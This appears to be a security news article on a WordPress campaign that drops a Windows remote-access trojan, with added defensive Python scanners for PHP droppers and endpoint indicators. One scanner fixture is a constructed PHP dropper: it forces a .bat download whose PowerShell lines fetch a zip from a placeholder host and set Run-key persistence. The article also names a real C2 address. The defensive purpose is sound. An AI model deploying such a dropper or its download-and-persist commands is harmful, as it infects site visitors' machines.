Stealthy WordPress Malware Uses PHP Backdoor to Deliver Windows Trojan

A sophisticated malware campaign targeting WordPress websites has recently been uncovered, showcasing an intricate and stealthy approach to delivering a Windows-based trojan.

This attack, which operates beneath the surface of seemingly clean websites, employs a layered infection chain involving PHP-based droppers, obfuscated code, and IP-based evasion tactics to distribute a malicious payload named client32.exe.

Hidden Infection Chain

The discovery highlights the evolving tactics of cybercriminals in exploiting web platforms for malware distribution.

The infection begins with two central PHP files, header.php and man.php, which act as the main controller and administrative interface, respectively.

The Administrative Interface

The header.php script profiles visitors, logs IP addresses in a file named count.txt to prevent repeated infections, and dynamically generates a heavily obfuscated Windows batch file, update.bat.

According to Sucuri's report, this batch script, pushed on the visitor as a forced file download via manipulated HTTP response headers, orchestrates a multi-stage attack on the victim's system.
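The server-side traits described above (per-IP logging to count.txt, a forced .bat download via response headers, and a generated batch file carrying a PowerShell download-and-persist chain) can be turned into a simple triage heuristic for a WordPress install. The scanner below is an added example written for this page; it is not Sucuri's detection logic and does not contain the real header.php. The two PHP samples are constructed stand-ins that only mimic the described behaviour (the download URL uses the reserved .invalid domain), and the weights are the editor's own judgement of how rarely each string appears in a legitimate theme file.

```python
"""Heuristic scanner for PHP files showing the dropper traits described above.

Added example, not Sucuri's detection logic and not the real header.php.
The two PHP samples are constructed stand-ins that mimic the behaviour the
article describes; the indicator weights are the editor's own assumptions.
"""
import os
import re

# One regex per behaviour attributed to header.php, with a weight.
INDICATORS = {
    # forcing the browser to download a .bat instead of rendering a page
    "forced_bat_download": (5, re.compile(
        r"Content-Disposition:\s*attachment;\s*filename=[\"']?[^\"'\s]+\.bat", re.I)),
    "octet_stream_header": (1, re.compile(r"Content-Type:\s*application/octet-stream", re.I)),
    # one-shot delivery: visitor IPs recorded in count.txt
    "ip_log_count_txt": (2, re.compile(r"count\.txt", re.I)),
    "remote_addr_profiling": (1, re.compile(r"\$_SERVER\s*\[\s*['\"]REMOTE_ADDR['\"]\s*\]")),
    # the generated batch file's own download / extract / persist chain
    "powershell_in_output": (2, re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    "download_primitive": (2, re.compile(r"Invoke-WebRequest|DownloadFile|\biwr\b|\bcurl\b", re.I)),
    "zip_extraction": (1, re.compile(r"Expand-Archive|\.zip\b", re.I)),
    "appdata_drop": (2, re.compile(r"%APPDATA%|\$env:APPDATA", re.I)),
    # matches the key with one or two backslashes (PHP single vs double quoting)
    "run_key_persistence": (3, re.compile(r"CurrentVersion\\{1,2}Run\b", re.I)),
}


def scan_php_source(src: str) -> list:
    """Return the names of all indicators present in one PHP file's text."""
    return [name for name, (_, rx) in INDICATORS.items() if rx.search(src)]


def risk_score(hits: list) -> int:
    return sum(INDICATORS[h][0] for h in hits)


def verdict(hits: list) -> str:
    """Crude triage label. A forced .bat download combined with any
    endpoint-stage indicator is a dropper regardless of the total score."""
    endpoint_stage = {"powershell_in_output", "download_primitive",
                      "appdata_drop", "run_key_persistence"}
    if "forced_bat_download" in hits and endpoint_stage & set(hits):
        return "likely-dropper"
    score = risk_score(hits)
    if score >= 8:
        return "likely-dropper"
    if score >= 3:
        return "review"
    return "clean"


def scan_tree(root: str):
    """Walk a WordPress install and yield (path, verdict, hits) for every .php
    file that is not clean. Files are read as latin-1 so binary junk inside
    obfuscated files cannot abort the scan."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="latin-1") as fh:
                hits = scan_php_source(fh.read())
            label = verdict(hits)
            if label != "clean":
                yield path, label, hits


# Constructed stand-in mimicking the described header.php (not the real file).
SUSPICIOUS_PHP = r'''<?php
$ip = $_SERVER['REMOTE_ADDR'];
$seen = file_exists('count.txt') ? file('count.txt', FILE_IGNORE_NEW_LINES) : [];
if (in_array($ip, $seen)) { exit; }
file_put_contents('count.txt', $ip . "\n", FILE_APPEND);
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="update.bat"');
echo "powershell -w hidden -c \"iwr http://example.invalid/psps.zip -o %APPDATA%\\x\\psps.zip\"\r\n";
echo "powershell -c \"Expand-Archive %APPDATA%\\x\\psps.zip %APPDATA%\\x\"\r\n";
echo "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v up /d %APPDATA%\\x\\client32.exe\r\n";
'''

# Constructed stand-in for an ordinary theme header.php.
BENIGN_PHP = r'''<?php
?><!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head><meta charset="<?php bloginfo('charset'); ?>"><?php wp_head(); ?></head>
<body <?php body_class(); ?>>
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_PHP), ("benign", BENIGN_PHP)):
        hits = scan_php_source(src)
        print(f"{label}: {verdict(hits)} (score {risk_score(hits)}) {hits}")
    # real use: for path, label, hits in scan_tree("/var/www/html"): print(path, label, hits)
```

Because the real script is heavily obfuscated and builds the batch file dynamically, string matching like this is evadable (the PowerShell and registry strings may be assembled at runtime or base64-encoded). Treat it as a first pass over a site and pair it with file-integrity checks against known-good theme and core files.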

Multi-Stage Attack

It uses PowerShell commands to download a malicious ZIP archive, psps.zip, containing the client32.exe trojan, extracts it to a hidden directory in %APPDATA%, and executes the payload.

Additionally, the script ensures persistence by adding a value under the HKEY_CURRENT_USER ...\CurrentVersion\Run key, so the trojan is launched again at every logon of the compromised user account.

Windows Trojan
Hidden Trojan Archive

The client32.exe binary, identified as a Remote Access Trojan (RAT), establishes a covert connection to a Command and Control (C2) server at 5.252.178.123 on port 443, enabling remote control and potential data exfiltration.
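On the endpoint side, the two durable artefacts the article describes are the Run-key value pointing into %APPDATA% and the outbound connection to 5.252.178.123:443. The script below is an added example, not Sucuri's tooling: it parses text in the shape that `reg query`, `netstat -ano` and `tasklist` print on Windows (capture them on the host and feed the output in), flags Run values whose executable lives under the Roaming profile or carries the client32.exe name, and joins any connection to the C2 address to its owning process. The three samples are constructed; the PIDs and the hidden directory name `.cache` are made up, and only the C2 address and the client32.exe name come from the article.

```python
"""Endpoint triage for the persistence and C2 traits described above.

Added example, not Sucuri's tooling. Parses `reg query`, `netstat -ano`
and `tasklist` output as Windows prints it. The three samples are
constructed; PIDs and the `.cache` directory name are made up.
"""
import re

C2_IOCS = {"5.252.178.123:443"}          # from the article
SUSPECT_IMAGES = {"client32.exe"}       # from the article

RUN_KEY_SAMPLE = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    update    REG_SZ    C:\Users\alice\AppData\Roaming\.cache\client32.exe
"""

NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.10:49812     5.252.178.123:443      ESTABLISHED     4212
  TCP    192.168.1.10:49813     203.0.113.10:443       ESTABLISHED     1880
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       980
  UDP    0.0.0.0:500            *:*                                    1104
"""

TASKLIST_SAMPLE = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
svchost.exe                    980 Services                   0      8,120 K
chrome.exe                    1880 Console                    1    210,112 K
client32.exe                  4212 Console                    1     12,344 K
"""


def parse_run_key(text: str) -> list:
    """(value name, command line) pairs from `reg query ...\\Run` output."""
    entries = []
    for line in text.splitlines():
        if not line.startswith("    "):
            continue  # the key-path header line is not a value
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if len(parts) == 3 and parts[1].startswith("REG_"):
            entries.append((parts[0], parts[2]))
    return entries


def image_path(command: str) -> str:
    """Executable path from a Run value: honour quoting, drop arguments."""
    m = re.match(r'"([^"]+)"|(\S+)', command.strip())
    return (m.group(1) or m.group(2)) if m else command


def suspicious_run_entries(entries: list) -> list:
    """Flag values whose executable sits under %APPDATA% (the Roaming profile)
    or uses a known trojan file name. AppData\\Local is deliberately not scored
    because legitimate per-user updaters commonly live there."""
    flagged = []
    for name, command in entries:
        path = image_path(command)
        low = path.lower()
        reasons = []
        if "\\appdata\\roaming\\" in low:
            reasons.append("runs from %APPDATA%")
        if low.rsplit("\\", 1)[-1] in SUSPECT_IMAGES:
            reasons.append("known trojan image name")
        if reasons:
            flagged.append((name, path, reasons))
    return flagged


def parse_netstat(text: str) -> list:
    """Connections from `netstat -ano`; UDP rows have no State column."""
    conns = []
    for line in text.splitlines():
        p = line.split()
        if p and p[0] == "TCP" and len(p) == 5:
            conns.append({"proto": "TCP", "local": p[1], "remote": p[2], "state": p[3], "pid": int(p[4])})
        elif p and p[0] == "UDP" and len(p) == 4:
            conns.append({"proto": "UDP", "local": p[1], "remote": p[2], "state": "", "pid": int(p[3])})
    return conns


def parse_tasklist(text: str) -> dict:
    """PID -> image name from default `tasklist` output."""
    rx = re.compile(r"^(.+?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")
    procs = {}
    for line in text.splitlines():
        m = rx.match(line)
        if m:
            procs[int(m.group(2))] = m.group(1).strip()
    return procs


def c2_hits(conns: list, procs: dict, iocs=C2_IOCS) -> list:
    """(remote endpoint, PID, image) for every connection to a known C2."""
    return [(c["remote"], c["pid"], procs.get(c["pid"], "?"))
            for c in conns if c["remote"] in iocs]


if __name__ == "__main__":
    print("persistence:", suspicious_run_entries(parse_run_key(RUN_KEY_SAMPLE)))
    print("c2:", c2_hits(parse_netstat(NETSTAT_SAMPLE), parse_tasklist(TASKLIST_SAMPLE)))
```

The IP match is the weakest of the two checks: C2 endpoints rotate, so a host that has rebooted since the operators moved infrastructure shows no connection yet still carries the Run value. Look for the persistence artefact first and use the C2 address only as confirmation.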

The administrative file, man.php, provides attackers with a web-based panel to monitor and manipulate the IP log, resetting or appending records as needed.

This level of control, combined with the campaign's stealth (serving the payload only once per IP address, which also frustrates repeat analysis, and executing silently on the endpoint), demonstrates a calculated effort to maximize infection rates while minimizing exposure.

The use of PowerShell for payload delivery and extraction further complicates detection by endpoint security solutions, as attackers increasingly leverage legitimate system tools for malicious purposes.

For website owners, this case underscores the importance of continuous monitoring, deploying Web Application Firewalls (WAFs), and maintaining updated CMS and server software to prevent initial compromises.

End-users are urged to exercise caution with unexpected downloads, keep antivirus solutions active, and ensure system updates are applied promptly to mitigate risks.

This WordPress malware campaign serves as a stark reminder of the persistent and evolving threats in the digital landscape, where attackers push the boundaries of stealth to compromise both web platforms and end-user systems.

